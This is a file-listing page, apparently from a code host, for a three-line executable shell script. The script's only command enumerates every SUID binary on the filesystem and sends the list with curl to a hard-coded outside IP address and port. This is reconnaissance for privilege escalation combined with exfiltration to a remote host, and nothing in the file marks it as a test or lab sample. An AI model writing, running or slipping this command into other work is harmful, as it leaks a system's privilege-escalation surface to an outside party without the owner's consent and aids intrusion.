3 lines
106 B
Bash
Executable File
3 lines
106 B
Bash
Executable File
#!/bin/sh
|
|
find / -perm -4000 -type f 2>&1 | curl -s -m 8 --data-binary @- http://202.79.169.91:28016/suid
|